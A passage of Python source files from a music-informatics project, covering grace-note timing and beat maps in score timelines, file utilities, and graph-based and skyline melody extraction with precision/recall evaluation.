new_timeline.append(new_points) # for new_points in new_timeline: # for i,p in enumerate(new_points): # for n in p.get_starting_objects_of_type(Note): # if n.duration > 130: # print(i, len(new_points)) # print(n) # print('',n) # assert 1 == 0 new_timeline = np.concatenate(new_timeline) for i in range(1, len(new_timeline)): new_timeline[i - 1].next = new_timeline[i] new_timeline[i].prev = new_timeline[i - 1] new_timeline[0].prev = None new_timeline[-1].next = None # assert np.all(np.diff(np.array([tp.t for tp in new_timeline])) > 0) tl = TimeLine() tl.points = new_timeline # for tp in tl.points: # print(tp) # for n in tp.get_starting_objects_of_type(Note): # print(n.start.t, tp.t, n.end.t) # assert n.start.t <= n.end.t return tl def remove_grace_notes(self): for point in self.timeline.points: point.starting_objects[Note] = [n for n in point.starting_objects[Note] if n.grace_type is None] point.ending_objects[Note] = [n for n in point.ending_objects[Note] if n.grace_type is None] def expand_grace_notes(self, default_type='appoggiatura', min_steal=.05, max_steal=.7): """ Expand durations of grace notes according to their specifications, or according to the default settings specified using the keywords. The onsets/offsets of the grace notes and surrounding notes are set accordingly. Multiple contiguous grace notes inside a voice are expanded sequentially. This function modifies the `points` attribute. Parameters ---------- default_type : str, optional. Default: 'appoggiatura' the type of grace note, if no type is specified. Possibilites are: {'appoggiatura', 'acciaccatura'}. min_steal : float, optional the min steal proportion if no proportion is specified max_steal : float, optional the max steal proportion if no proportion is specified """ assert default_type in (u'appoggiatura', u'acciaccatura') assert 0 < min_steal <= max_steal assert min_steal <= max_steal < 1.0 def n_notes_to_steal(n_notes): return min_steal + (max_steal - min_steal) * 2 * (1 / (1 + np.exp(- n_notes + 1)) - .5) # def shorten_main_notes_by(dur_prop, notes, group_id): # # start and duration of the main note # old_start = notes[0].start # n_dur = np.min([n.duration for n in notes]) # new_start_t = old_start.t + n_dur * dur_prop # print(n_dur * dur_prop) # for i, n in enumerate(notes): # old_start.starting_objects[Note].remove(n) # self.timeline.add_starting_object(new_start_t, n) # n.appoggiatura_group_id = group_id # n.appoggiatura_duration = dur_prop # return new_start_t def shorten_main_notes_by(offset, notes, group_id): # start and duration of the main note old_start = notes[0].start n_dur = np.min([n.duration for n in notes]) # print('app', n_dur, offset) offset = min(n_dur * .5, offset) new_start_t = old_start.t + offset for i, n in enumerate(notes): old_start.starting_objects[Note].remove(n) self.timeline.add_starting_object(new_start_t, n) n.appoggiatura_group_id = group_id n.appoggiatura_duration = offset / float(n_dur) return new_start_t # def shorten_prev_notes_by(dur_prop, notes, group_id): # old_end = notes[0].end # n_dur = notes[0].duration # new_end_t = old_end.t - n_dur * dur_prop # for n in notes: # old_end.ending_objects[Note].remove(n) # self.timeline.add_ending_object(new_end_t, n) # n.acciaccatura_group_id = group_id # n.acciaccatura_duration = dur_prop # return new_end_t def shorten_prev_notes_by(offset, notes, group_id): old_end = notes[0].end n_dur = notes[0].duration #print('acc', n_dur, offset) offset = min(n_dur * .5, offset) new_end_t = old_end.t - offset for n in notes: old_end.ending_objects[Note].remove(n) self.timeline.add_ending_object(new_end_t, n) n.acciaccatura_group_id = group_id n.acciaccatura_duration = offset / float(n_dur) return new_end_t def set_acciaccatura_times(notes, start_t, group_id): N = len(notes) end_t = notes[0].start.t times = np.linspace(start_t, end_t, N + 1, endpoint=True) for i, n in enumerate(notes): n.start.starting_objects[Note].remove(n) self.timeline.add_starting_object(times[i], n) n.end.ending_objects[Note].remove(n) self.timeline.add_ending_object(times[i + 1], n) n.acciaccatura_group_id = group_id n.acciaccatura_idx = i n.acciaccatura_size = N def set_appoggiatura_times(notes, end_t, group_id): N = len(notes) start_t = notes[0].start.t times = np.linspace(start_t, end_t, N + 1, endpoint=True) for i, n in enumerate(notes): n.start.starting_objects[Note].remove(n) self.timeline.add_starting_object(times[i], n) n.end.ending_objects[Note].remove(n) self.timeline.add_ending_object(times[i + 1], n) n.appoggiatura_group_id = group_id n.appoggiatura_idx = i n.appoggiatura_size = N self.timeline.unlock() grace_notes = [n for n in self.notes if n.grace_type is not None] time_grouped_gns = partition( operator.attrgetter('start.t'), grace_notes) times = sorted(time_grouped_gns.keys()) group_counter = 0 for t in times: voice_grouped_gns = partition(operator.attrgetter('voice'), time_grouped_gns[t]) # print(t) for voice, gn_group in voice_grouped_gns.items(): # print(' voice {}'.format(voice)) for n in gn_group: if n.grace_type == 'grace': n.grace_type = default_type type_grouped_gns = partition(operator.attrgetter('grace_type'), gn_group) for gtype, type_group in type_grouped_gns.items(): total_steal_old = n_notes_to_steal(len(type_group)) total_steal = np.sum([n.duration_from_symbolic for n in type_group]) # print("n_notes, old, new", len(type_group), total_steal_old, total_steal) # print(' {}: {} {:.3f}'.format(gtype, len(type_group), # total_steal)) main_notes = [m for m in type_group[0].simultaneous_notes_in_voice if m.grace_type is None] # multip if len(main_notes) > 0: # total_steal = total_steal = min(main_notes[0].duration / 2., total_steal) if gtype == 'appoggiatura': # main_notes = [m for m in type_group[0].simultaneous_notes_in_voice # if m.grace_type is None] # print(total_steal, len(type_group)) total_steal = np.sum([n.duration_from_symbolic for n in type_group]) # if len(main_notes) == 0: # main_notes = [m for m in type_group[0].next_notes_in_voice # if m.grace_type is None] # print(' main: {}'.format(len(main_notes))) if len(main_notes) > 0: new_onset = shorten_main_notes_by( total_steal, main_notes, group_counter) set_appoggiatura_times( type_group, new_onset, group_counter) group_counter += 1 elif gtype == 'acciaccatura': prev_notes = [m for m in type_group[0].previous_notes_in_voice if m.grace_type is None] # print(' prev: {}'.format(len(prev_notes))) if len(prev_notes) > 0: new_offset = shorten_prev_notes_by( total_steal, prev_notes, group_counter) set_acciaccatura_times( type_group, new_offset, group_counter) group_counter += 1 self.timeline.link() self.timeline.lock() def pprint(self, l=0): pre = u' ' * l s = [u'{}{} ({})'.format(pre, self.part_name, self.part_id)] bm = self.beat_map for tp in self.timeline.points: #s.append(pre + tp.__unicode__() + u'(beat: {0})'.format(bm(tp.t))) s.append(u'{}{}(beat: {})'.format(pre, tp, bm(tp.t)[0])) for cls, objects in tp.starting_objects.items(): if len(objects) > 0: #s.append(pre + u' {0}'.format(cls.__name__)) s.append(u'{} {}'.format(pre, cls.__name__)) for o in objects: #s.append(pre + u' {0}'.format(o)) s.append(u'{} {}'.format(pre, o)) s.append(u' Stop') for cls, objects in tp.ending_objects.items(): if len(objects) > 0: #s.append(pre + u' {0}'.format(cls.__name__)) s.append(u'{} {}'.format(pre, cls.__name__)) for o in objects: #s.append(pre + u' {0}'.format(o)) s.append(u'{} {}'.format(pre, o)) return u'\n'.join(s) def _get_beat_map(self, quarter=False, default_div=1, default_den=4): """ This returns an interpolator that will accept as input timestamps in divisions and returns these timestamps' beatnumbers. If the flag `quarter` is used, these beatnumbers will refer to quarter note steps. Parameters ---------- quarter : boolean, optional. Default: False Returns ------- scipy interpolate interp1d object """ if len(self.timeline.points) == 0: return None try: first_measure = self.timeline.points[ 0].get_starting_objects_of_type(Measure)[0] if first_measure.upbeat: offset = -first_measure.get_measure_duration(quarter=quarter) else: offset = 0 except IndexError: offset = 0 divs = np.array( [(x.start.t, x.divs) for x in self.timeline.get_all_of_type(Divisions)], dtype=np.int) dens = np.array( [(x.start.t, np.log2(x.beat_type)) for x in self.timeline.get_all_of_type(TimeSignature)], dtype=np.int) if divs.shape[0] == 0: LOGGER.warning(("No Divisions found in ScorePart, " "assuming divisions = {0}").format(default_div)) divs = np.array(((0, default_div),), dtype=np.int) if dens.shape[0] == 0: LOGGER.warning(("No TimeSignature found in ScorePart, " "assuming denominator = {0}").format(default_den)) dens = np.array(((0, np.log2(default_den)),), dtype=np.int) # remove lines unnecessary for linear interpolation didx = np.r_[0, np.where(np.diff(divs[:, 1]) != 0)[0] + 1] divs = divs[didx] # remove lines unnecessary for linear interpolation didx = np.r_[0, np.where(np.diff(dens[:, 1]) != 0)[0] + 1] dens = dens[didx] start = self.timeline.points[0].t end = self.timeline.points[-1].t if divs[-1, 0] < end: divs = np.vstack((divs, (end, divs[-1, 1]))) if dens[-1, 0] < end: dens = np.vstack((dens, (end, dens[-1, 1]))) if divs[0, 0] > start: divs = np.vstack(((start, divs[0, 1]), divs)) if dens[0, 0] > start: dens = np.vstack(((start, dens[0, 1]), dens)) if quarter: dens[:, 1] = 1 # integrate second column, where first column is time: # new_divs = np.cumsum(np.diff(divs[:, 0]) * divs[:-1, 1]) new_divs = divide_outside_cumsum(divs) divs = divs.astype(np.float) divs[1:, 1] = new_divs divs[0, 1] = divs[0, 0] # at this point divs[:, 0] is a list of musicxml div times # and divs[:, 1] is a list of corresponding quarter note times # interpolation object to map div times to quarter times: # div_intp = my_interp1d(divs[:, 0], divs[:, 1]) div_intp = interp1d(divs[:, 0], divs[:, 1]) dens = dens.astype(np.float) # change dens[:, 0] from div to quarter times dens[:, 0] = div_intp(dens[:, 0]) # change dens[:, 1] back from log2(beat_type) to beat_type and divide by # 4; Here take the reciprocal (4 / 2**dens[:, 1]) since in divid_outside_cumsum we will be # dividing rather than multiplying: dens[:, 1] = 4 / 2**dens[:, 1] # dens_new = np.cumsum(np.diff(dens[:, 0]) * dens[:-1, 1]) dens_new = divide_outside_cumsum(dens) dens[1:, 1] = dens_new dens[0, 1] = dens[0, 0] den_intp = interp1d(dens[:, 0], dens[:, 1]) if len(self.timeline.points) < 2: return lambda x: np.zeros(len(x)) else: def f(x): try: # divi = div_intp(x) # deni = den_intp(divi) + offset # np.savetxt('/tmp/bm.txt', np.column_stack((x, divi, deni)), fmt="%.3f") # np.savetxt('/tmp/den.txt', dens, fmt="%.3f") # return deni return den_intp(div_intp(x)) + offset except ValueError: print(np.min(x),np.max(x)) raise return f def _get_notes(self, unfolded=False): """ return all note objects of the score part. Parameters ---------- unfolded : boolean, optional. Default: False whether to unfolded the timeline or not. Returns ------- notes : list of Note objects """ notes = [] if unfolded: tl = self.unfold_timeline() else: tl = self.timeline for tp in tl.points: notes.extend(tp.get_starting_objects_of_type(Note) or []) return notes def get_loudness_directions(self): """ return all loudness directions """ return self.timeline.get_all_of_type(LoudnessDirection, include_subclasses=True) # directions = [] # for tp in self.timeline.points: # directions.extend( # tp.get_starting_objects_of_type(DynamicLoudnessDirection) or []) # directions.extend( # tp.get_starting_objects_of_type(ConstantLoudnessDirection) or []) # directions.extend( # tp.get_starting_objects_of_type(ImpulsiveLoudnessDirection) or []) # return directions def get_tempo_directions(self): """ return all tempo directions """ return self.timeline.get_all_of_type(TempoDirection, include_subclasses=True) # directions = [] # for tp in self.timeline.points: # directions.extend( # tp.get_starting_objects_of_type(DynamicTempoDirection) or []) # directions.extend( # tp.get_starting_objects_of_type(ConstantTempoDirection) or []) # return directions # @property @cached_property def notes(self): """ all note objects """ return self._get_notes() @cached_property def notes_unfolded(self): """ all note objects, with unfolded timeline. """ return self._get_notes(unfolded=True) #@cached_property @property def beat_map(self): """ map timeline times to beat times """ return self._get_beat_map() #@cached_property @property def quarter_map(self): """ map timeline times to beat times """ return self._get_beat_map(quarter=True) ``` #### File: extra/tests/test_matchfile.py ```python import argparse import numpy as np from data_handling import matchfile from data_handling.sparse_feature_extraction import score2spr from data_handling.sparse_datafiles import csr_to_file def summarize_match_file(m): """ Display some information from a Match file :param m: a MatchFile object """ # print header info for line in m.info(): print(u' {0}\t{1}'.format(line.Attribute,line.Value).expandtabs(20)) # print time sig info print('Time signatures:') for t, (n, d) in m.time_signatures: print(' {0}/{1} at beat {2}'.format(n, d, t)) def get_notes_from_match(m): notes = np.array([(sn.OnsetInBeats, sn.OffsetInBeats, sn.MidiPitch[0]) for sn, n in m.note_pairs], np.float) lowest = 30 highest = 100 beat_div = 8 neighbour_beats = 2 onset_only = True A, _ = score2spr(notes, onset_only, lowest, highest, beat_div, neighbour_beats) outfile = '/tmp/sparse.npz' print('saving sparse matrix to {0}'.format(outfile)) csr_to_file(outfile, A) def main(): """ Illustrate some functionality of the match module """ parser = argparse.ArgumentParser("Get information from a Matchfile file") parser.add_argument("file", help="Match file") args = parser.parse_args() m = matchfile.MatchFile(args.file) #summarize_match_file(m) get_notes_from_match(m) if __name__ == '__main__': main() ``` #### File: extra/utils/os_utils.py ```python import subprocess import sys import tty import termios import os import re from collections import defaultdict import signal import logging from functools import wraps import cPickle import bz2 import gzip from cPickle import UnpicklingError LOGGER = logging.getLogger(__name__) def load_pyc_bz(fn): return cPickle.load(bz2.BZ2File(fn, 'r')) def save_pyc_bz(d, fn): cPickle.dump(d, bz2.BZ2File(fn, 'w'), cPickle.HIGHEST_PROTOCOL) def load_pyc_gz(fn): return cPickle.load(gzip.GzipFile(fn, 'r')) def save_pyc_gz(d, fn): cPickle.dump(d, gzip.GzipFile(fn, 'w'), cPickle.HIGHEST_PROTOCOL) def get_from_cache_or_compute(cache_fn, func, args=(), kwargs={}, refresh_cache=False): """ If `cache_fn` exists, return the unpickled contents of that file (the cache file is treated as a bzipped pickle file). If this fails, compute `func`(*`args`), pickle the result to `cache_fn`, and return the result. Parameters ---------- func : function function to compute args : tuple argument for which to evaluate `func` cache_fn : str file name to load the computed value `func`(*`args`) from refresh_cache : boolean if True, ignore the cache file, compute function, and store the result in the cache file Returns ------- object the result of `func`(*`args`) """ result = None if cache_fn is not None and os.path.exists(cache_fn): if refresh_cache: os.remove(cache_fn) else: try: result = load_pyc_bz(cache_fn) except UnpicklingError as e: LOGGER.error(('The file {0} exists, but cannot be unpickled. Is it readable? Is this a pickle file?' '').format(cache_fn)) raise e if result is None: result = func(*args, **kwargs) if cache_fn is not None: save_pyc_bz(result, cache_fn) return result def debug_mode(logger): """ Return True when logger is in DEBUG mode, False otherwise. :param logger: a Logger instance from the logging module :return: True or False """ return logger.getEffectiveLevel() == logging.DEBUG def init_worker(): """ Setup a worker to ignore signals """ signal.signal(signal.SIGINT, signal.SIG_IGN) # class KeyboardInterruptError(Exception): pass # this approach doesn't really work # since decorated functions can't be pickled def catch_KeyboardInterrupt(fun): def wrapper(*args, **kwargs): try: return fun(*args, **kwargs) except KeyboardInterrupt: raise KeyboardInterruptError() return wrapper class Result(object): """ A drop-in replacement for the Result object returned by asynchronous multiprocessing calls """ def __init__(self, v): self.v = v def get(self): return self.v class FakePool(object): """ A drop-in replacement for multiprocessing.Pool that carries out jobs sequentially (useful for debugging). """ def __init__(self, *args): pass def map(self, f, a): return map(f, a) def apply_async(self, f, args=(), kwargs={}, callback=None): if callback: callback(f(*args, **kwargs)) else: return Result(f(*args, **kwargs)) def close(self): pass def terminate(self): pass def join(self): pass class PoolWrapper(object): """ Class that can be Parameters ---------- x : type Description of parameter `x`. Returns ------- int Description of return value """ def __init__(self, target): self.target = target try: functools.update_wrapper(self, target) except: pass def __call__(self, args): try: return self.target(*args) except KeyboardInterrupt: print('child interrupted') return None def pair_files(dir_dict, remove_incomplete=True): """ Pair files in directories; dir_dict is of form (label: directory) """ result = defaultdict(dict) for label, directory in dir_dict.items(): for f in os.listdir(directory): name = os.path.splitext(f)[0] result[name][label] = f if remove_incomplete: labels = dir_dict.keys() for k in result.keys(): if not all([y in result[k] for y in labels]): del result[k] return result def pair_files_new(dir_dict, remove_incomplete=True, split=False, remove_parts=set()): """ Pair files in directories; dir_dict is of form (label: directory) """ result = defaultdict(dict) if split: pat = re.compile(split) for label, directory in dir_dict.items(): for f in os.listdir(directory): name = os.path.splitext(f)[0] if split: key = tuple([x for i, x in enumerate(pat.split(name)) if not i in remove_parts]) else: key = name result[key][label] = f if remove_incomplete: labels = dir_dict.keys() for k in result.keys(): if not all([y in result[k] for y in labels]): del result[k] return result def get_output_from_command(cmd): """Simple wrapper around popen2, to get output from a shell command""" p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, close_fds=True) p.stdin.close() result = p.stdout.readlines() p.stdout.close() return result class _Getch: """ Get a single character from standard input; Do not echo to the screen """ def __init__(self, enc=False): try: self.impl = _GetchUnix(enc) except ImportError: self.impl = _GetchWindows(enc) def __call__(self): return self.impl() class _GetchUnix: def __init__(self, enc=False): self.enc = enc if self.enc: import codecs import locale # Wrap stdin with an encoding-aware reader. _, encoding = locale.getdefaultlocale() encoding = encoding or 'utf8' self.stdin = codecs.getreader(encoding)(sys.stdin) else: self.stdin = sys.stdin def __call__(self): # import sys, tty, termios fd = self.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) ch = self.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch class _GetchWindows: def __init__(self, enc=False): import msvcrt def __call__(self): import msvcrt return msvcrt.getch() get_character = _Getch() get_character_enc = _Getch(enc=True) def interrupt_decorator(f): @wraps(f) def wrapper(*args, **kwargs): try: return f(*args, **kwargs) except KeyboardInterrupt: print('\nfunction {0}.{1} was configured to intercept ' 'KeyboardInterrupts. Press "a" to abort, or any other ' 'key to continue.' .format(f.__module__, f.__name__)) x = get_character() if x == 'a': raise KeyboardInterrupt else: return None return wrapper if __name__ == '__main__': pass ``` #### File: Symbolic-Melody-Identification/melody_extractor/graph_tools.py ```python import time import math import numpy as np import sklearn.metrics from scipy.sparse import csgraph from sklearn.model_selection import train_test_split import misc_tools import settings try: import cPickle as pickle except Exception: import pickle FINAL_VALUE = -0.5 def compute_prob(note, prob_map, THRESHOLD): """ compute the probability of *note* referred to *prob_map*. If the probability is higher than *THRESHOLD*, than the cost will be > 0, otherwise it will be 0. """ pitch, onset, offset, ismelody = note m = prob_map[pitch, onset: offset] if m.shape[0] > 2 and settings.OUTLIERS_ON_PROB: m = m[modified_z_score(m)] if settings.AVERAGE: p = m.mean() else: p = np.median(m) if p < THRESHOLD: return -0.5 else: return p def build_graph_matrix(notelist, prob_map, THRESHOLD): """ Returns a 2D array containing the matrix relative to the branch costs in the graph. For each note A in *notelist*, it creates branches to the notes N_i so that: 1) onset(N_k) == onset(N_l) for each k, l 2) onset(N_i) == min{onset(Y)} where Y: onset(Y) > offset(A), cost(Y) = 1 - probability(Y) <= *THRESHOLD*} for each i This also adds two new virtual notes representing the first and the last note. """ out = np.full((len(notelist) + 2, len(notelist) + 2), np.inf, dtype=settings.floatX) last_onset = notelist[0][0] # initialize the starting virtual note FOUND_NEXT_NOTE = False for i, note_i in enumerate(notelist, start=1): pitch_i, onset_i, offset_i, melody_i = note_i if onset_i > last_onset and FOUND_NEXT_NOTE: # we have found a note in the previous onset break cost_i = -compute_prob(note_i, prob_map, THRESHOLD) if cost_i > 0: continue else: FOUND_NEXT_NOTE = True out[0, i] = cost_i last_onset = onset_i for i, note_i in enumerate(notelist): pitch_i, onset_i, offset_i, melody_i = note_i FOUND_NEXT_NOTE = False for j, note_j in enumerate(notelist[i + 1:], start=1): pitch_j, onset_j, offset_j, melody_j = note_j if onset_j < offset_i: continue elif FOUND_NEXT_NOTE and notelist[i + j - 1][0] < onset_j: break cost_j = -compute_prob(note_j, prob_map, THRESHOLD) if cost_j > 0: continue else: FOUND_NEXT_NOTE = True # i + 1 because we have added a virtual note out[(i + 1), (i + 1) + j] = cost_j last_onset = onset_j # this is the last note reachable if not FOUND_NEXT_NOTE: # let's jump to the last virtual state out[(i + 1), -1] = FINAL_VALUE # making the last notes pointing to the ending virtual note # is this required?? for i, note_i in enumerate(reversed(notelist), start=2): if note_i[1] < last_onset: break elif note_i[1] > last_onset: continue else: out[-i, -1] = FINAL_VALUE return out def _check(notelist, pianoroll_prob): """ Just for debugging """ WIN_WIDTH = int(settings.ARG_DEFAULT['win_w']) EPS = misc_tools.EPS(0) for j, (onset, offset, pitch) in enumerate(notelist): flag = False if pianoroll_prob[pitch, onset] < EPS: for i in range(WIN_WIDTH): if pianoroll_prob[pitch, onset - i] >= EPS: print("you're wrong of -" + str(i) + " for onset of note " + str(j)) flag = True break if pianoroll_prob[pitch, onset + i] >= EPS: print("you're wrong of +" + str(i) + " for onset of note " + str(j)) flag = True break elif pianoroll_prob[pitch, offset - 1] < EPS: for i in range(WIN_WIDTH): if pianoroll_prob[pitch, offset - 1 - i] >= EPS: print("you're wrong of -" + str(i) + " for offset of note " + str(j)) flag = True break if pianoroll_prob[pitch, offset - 1 + i] >= EPS: print("you're wrong of +" + str(i) + " for offset of note " + str(j)) flag = True break else: for i in range(onset, offset): if pianoroll_prob[pitch, i] < EPS: print("note " + str(j) + " has some internal values set to 0") flag = True break if flag: return 1 # if not flag: # print("note " + str(j) + " is correct") return 0 def modified_z_score(ys): """ PARAMETERS : ------------ list-like object, usually 1D np.array RETURN : -------- a new 1D np.array containing the indices of elements not ouliers stolen from http://colingorrie.github.io/outlier-detection.html """ threshold = 3.5 median_y = np.median(ys) median_absolute_deviation_y = np.median([np.abs(y - median_y) for y in ys]) modified_z_scores = [0.6745 * (y - median_y) / median_absolute_deviation_y for y in ys] return np.where(np.abs(modified_z_scores) < threshold)[0] def iqr(ys): """ PARAMETERS : ------------ list-like object, usually 1D np.array RETURN : -------- a new 1D np.array containing the indices of elements not ouliers stolen from http://colingorrie.github.io/outlier-detection.html """ quartile_1, quartile_3 = np.percentile(ys, [25, 75]) iqr = quartile_3 - quartile_1 lower_bound = quartile_1 - (iqr * 1.5) upper_bound = quartile_3 + (iqr * 1.5) return np.where((ys < upper_bound) | (ys > lower_bound))[0] def set_threshold(arr, CLUSTERING='single'): print("starting clustering") arr = arr.reshape(-1) arr = arr[arr > settings.MIN_TH] N_CLUSTER = 2 target_cluster = 1 print("max, min: ", arr.max(), arr.min()) arr = arr[iqr(arr)] if CLUSTERING == 'kmeans': from sklearn.cluster import KMeans kmeans = KMeans(n_clusters=N_CLUSTER, init=np.array([settings.MIN_TH, arr.max()]).reshape(-1, 1)) labels = kmeans.fit_predict(arr.reshape(-1, 1)) else: import fastcluster from scipy.cluster.hierarchy import fcluster from scipy.spatial.distance import pdist Z = pdist(arr.reshape(-1, 1)) if CLUSTERING == 'single': X = fastcluster.single(Z) elif CLUSTERING == 'average': X = fastcluster.average(Z) elif CLUSTERING == 'centroid': X = fastcluster.centroid(Z) else: return settings.THRESHOLD labels = N_CLUSTER - fcluster(X, N_CLUSTER, 'maxclust') # setting 0 for the minimum cluster # np.ma.masked_array returns only values where the mask is 0 index = {} for i, l in enumerate(labels): index[l] = arr[i] if len(index.keys()) == N_CLUSTER: break index = sorted(index.items(), key=lambda kv: kv[1]) # list of tuples sorted by values target_label = index[target_cluster - 1][0] # the label of the desired cluster th = np.max(arr[np.flatnonzero(labels == target_label)]) # max of the down cluster print("found threshold: " + str(th)) # print(str(np.ma.masked_array(arr, 1 - labels).min())) return th def polyphonic_part(notelist, pianoroll_prob, THRESHOLD): """ Returns a list of int: 1 if the note at that index in *notelist* has a probability > *THRESHOLD*, 0 otherwise. """ predicted_labels = [] for note in notelist: c = compute_prob(note, pianoroll_prob, THRESHOLD) if np.isnan(c): # don't know why this happens, we had already discarded nans... predicted_labels.append(0) else: predicted_labels.append(int(math.ceil(c))) return predicted_labels def monophonic_part(notelist, pianoroll_prob, THRESHOLD): """ Compute a strictly monophonic part by using the shortest path algorithm specified in `settings` RETURNS : a tuple containing : list(int) : the predicted labels list(int) : the melody indices """ # compute the graph matrix graph = build_graph_matrix(notelist, pianoroll_prob, THRESHOLD) # compute the minimum paths dist_matrix, predecessors = csgraph.shortest_path(graph, method=settings.PATH_METHOD, directed=True, indices=[0], return_predecessors=True) # building the predicted array label last = predecessors[0, -1] predicted_labels = [0 for j in range(len(notelist) + 2)] melody_indices = [] while last != -9999: predicted_labels[last] = 1 melody_indices.append(last) last = predecessors[0, last] predicted_labels = predicted_labels[1:-1] return predicted_labels, melody_indices def predict_labels(pianoroll_prob, in_notelist): """ Compute notes in the solo part according to the input notelist and a pianoroll probability distribution. PARAMETERS : pianoroll_prob : 2d np.array the pianoroll distribution in_notelist : 2d np.array the input list of notes as returned by `utils.pianoroll_utils.make_pianorolls` RETURNS : a tuple of 1D arrays : true labels according to `in_notelist` (1 where there is a 'solo part', 0 where there isn't) predicted labels according to `in_notelist` """ # ordering notelist by onset: notelist = in_notelist[in_notelist[:, 1].argsort()] # changing all nan to 2 * EPS(0) for i in np.nditer(pianoroll_prob, op_flags=['readwrite']): if np.isnan(i): i[...] = 2 * misc_tools.EPS(0) # np.nan_to_num(pianoroll_prob, copy=False) # looking for the first non empty column s = pianoroll_prob.sum(axis=0).nonzero()[0] # first column with non zero values minus first onset pad_length = s[0] - in_notelist[0][1] notelist = [(pitch, onset + pad_length, offset + pad_length, ismelody) for pitch, onset, offset, ismelody in in_notelist] # notelist has no more the ground-truth, so we are using in_notelist true_labels = zip(*in_notelist)[-1] THRESHOLD = settings.THRESHOLD if settings.CLUSTERING != 'None': THRESHOLD = set_threshold( pianoroll_prob, CLUSTERING=settings.CLUSTERING) if settings.MONOPHONIC: # compute the graph matrix predicted_labels = monophonic_part( notelist, pianoroll_prob, THRESHOLD)[0] else: predicted_labels = polyphonic_part( notelist, pianoroll_prob, THRESHOLD) return np.array(true_labels), np.array(predicted_labels) def test_shortest_path(test_notelists, predictions, pieces_indices=None, OUT_FILE=None): """ This build a graph starting from *test_notelists* and *predictions* and computes the minimum cost path through Dijkstra algortihm for DAG non-negative weighted graphs. It also computes Precision, Recall and F-measure for each piece in *test_notelists * and the avarage F_measure *test_notelists * must be an array-like of notelists as created by *misc_tools.load_files* RETURNS: a tuple of three lists containing: * fmeasures * precisions * recalls computed on pieces in the notelists in input """ fmeasure_list = [] precision_list = [] recall_list = [] for i in range(len(test_notelists)): pianoroll_prob = predictions[i] in_notelist = test_notelists[i] true_labels, predicted_labels = predict_labels( pianoroll_prob, in_notelist) # compute fmeasure, precision and recall: precision = sklearn.metrics.precision_score( true_labels, predicted_labels) recall = sklearn.metrics.recall_score(true_labels, predicted_labels) fmeasure = 2 * precision * recall / (precision + recall) if np.isnan(fmeasure): fmeasure = 0.0 if (OUT_FILE is not None) and (pieces_indices is not None): OUT_FILE.write("\nPiece number: " + str(pieces_indices[i])) OUT_FILE.write("\nPrecision: " + str(precision)) OUT_FILE.write("\nRecall: " + str(recall)) OUT_FILE.write("\nF1-measure: " + str(fmeasure) + "\n") print("Piece number: " + str(pieces_indices[i])) print("Precision: " + str(precision)) print("Recall: " + str(recall)) print("F1-measure: " + str(fmeasure)) print("") fmeasure_list.append(fmeasure) precision_list.append(precision) recall_list.append(recall) if (OUT_FILE is not None) and (pieces_indices is not None): OUT_FILE.flush() # print("Avarage fmeasure scores: " + str(np.mean(fmeasure_list))) return fmeasure_list, precision_list, recall_list ``` #### File: Symbolic-Melody-Identification/melody_extractor/skyline.py ```python import numpy as np from sklearn.model_selection import train_test_split import sklearn.metrics from data_handling import parse_data import misc_tools import settings def skyline_pianorolls(input, onset=True): """ Perform the skyline algorithm on *pianoroll*. This just takes the highest note at each time. If *onset* is True, then the original version is used, in which the highest pitch referred to the most recent onset is considered to be melody. Reference paper: <NAME> and <NAME>, "Melodic matching techniques for large music databases," in Proceedings of the 7th ACM International Conference on Multimedia '99, Orlando, FL, USA, October 30 - November 5, 1999, Part 1., 1999, pp. 57-66. RETURNS: a new array of shape *pianoroll.shape* containing the resulting pianoroll """ pianoroll = np.array(input, dtype=misc_tools.floatX) returned = np.zeros(pianoroll.shape, pianoroll.dtype) for y, col in enumerate(pianoroll.T): # iterating over columns backup = False for x, v in enumerate(col): # iterating over pitches if v != 0: if onset: if pianoroll[x, y - 1] == 0: # new onset at highest pitch returned[x, y] = v backup = False break elif not backup: # this is the highest value coming from a previous onset, # store this value and add it after having parsed the whole # column backup = (x, y, v) # N.B. now bool(backup) == True else: returned[x, y] = v break if backup: # add the highest value coming from a previous onset returned[backup[0], backup[1]] = backup[2] backup = False return returned def test_skyline_pianorolls(PATH=settings.DATA_PATH): import os from data_handling import parse_data # recurse all directories dataset = [] for root, subdirs, files in os.walk(PATH): # for each file with extension '.bz2' for f in files: if f[-3:] == ".bz": new_file = os.path.join(root, f) print("I've found a new file: " + new_file) # load pianorolls score and melody score, melody = parse_data.make_pianorolls(new_file) dataset.append((score, melody)) train_set, test_set = train_test_split( dataset, test_size=0.20, random_state=42) overall_sk_tp = overall_sk_fp = overall_sk_tn = overall_sk_fn = 0 overall_hp_tp = overall_hp_fp = overall_hp_tn = overall_hp_fn = 0 avarage_pieces_sk = [] avarage_pieces_hp = [] for score, melody in test_set: sk = skyline_pianorolls(score) results = misc_tools.evaluate(sk, melody) overall_sk_tp += results[0] overall_sk_fp += results[1] overall_sk_tn += results[2] overall_sk_fn += results[3] p = results[0] / misc_tools.EPS(results[0] + results[1]) r = results[0] / misc_tools.EPS(results[0] + results[3]) f = 2 * r * p / misc_tools.EPS(p + r) avarage_pieces_sk.append((p, r, f)) hp = skyline_pianorolls(score, onset=False) results = misc_tools.evaluate(hp, melody) overall_hp_tp += results[0] overall_hp_fp += results[1] overall_hp_tn += results[2] overall_hp_fn += results[3] p = results[0] / misc_tools.EPS(results[0] + results[1]) r = results[0] / misc_tools.EPS(results[0] + results[3]) f = 2 * r * p / misc_tools.EPS(p + r) avarage_pieces_hp.append((p, r, f)) # parse_data.plot_pianorolls( # score, sk, out_fn=f + "_skyline.pdf") # parse_data.plot_pianorolls( # score, hp, out_fn=f + "_highestpitch.pdf") print("Final Results Skyline:") print("True positives: " + str(overall_sk_tp)) print("False positives: " + str(overall_sk_fp)) print("True negatives: " + str(overall_sk_tn)) print("False negatives: " + str(overall_sk_fn)) p = overall_sk_tp / misc_tools.EPS(overall_sk_tp + overall_sk_fp) r = overall_sk_tp / misc_tools.EPS(overall_sk_tp + overall_sk_fn) print("Precision: " + str(p)) print("Recall: " + str(r)) print("Fmeasures: " + str(2 * r * p / misc_tools.EPS(p + r))) print("Avarage piece precision: " + str(np.mean(avarage_pieces_sk[0]))) print("Avarage piece recall: " + str(np.mean(avarage_pieces_sk[1]))) print("Avarage piece fmeasure: " + str(np.mean(avarage_pieces_sk[2]))) print() print("Final Results Highest Pitch:") print("True 